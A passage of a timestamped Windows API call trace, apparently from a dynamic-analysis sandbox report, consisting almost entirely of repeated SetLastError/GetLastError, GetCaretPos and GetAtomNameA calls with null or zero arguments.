SetLastError (dwErrCode=0x0) [0097.712] GetLastError () returned 0x0 [0097.712] SetLastError (dwErrCode=0x0) [0097.712] GetLastError () returned 0x0 [0097.712] SetLastError (dwErrCode=0x0) [0097.712] GetLastError () returned 0x0 [0097.712] SetLastError (dwErrCode=0x0) [0097.712] GetLastError () returned 0x0 [0097.712] SetLastError (dwErrCode=0x0) [0097.712] GetLastError () returned 0x0 [0097.712] SetLastError (dwErrCode=0x0) [0097.712] GetLastError () returned 0x0 [0097.712] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] GetLastError () returned 0x0 [0097.939] lstrlenA (lpString="") returned 0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.940] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.940] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.941] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.941] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.942] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.942] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.943] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.943] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.944] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.944] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.944] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.944] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.944] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.944] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.944] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.944] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.944] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.944] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.944] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.944] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.945] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.945] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.946] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.946] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.947] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.947] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.948] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.948] GetCaretPos (in: 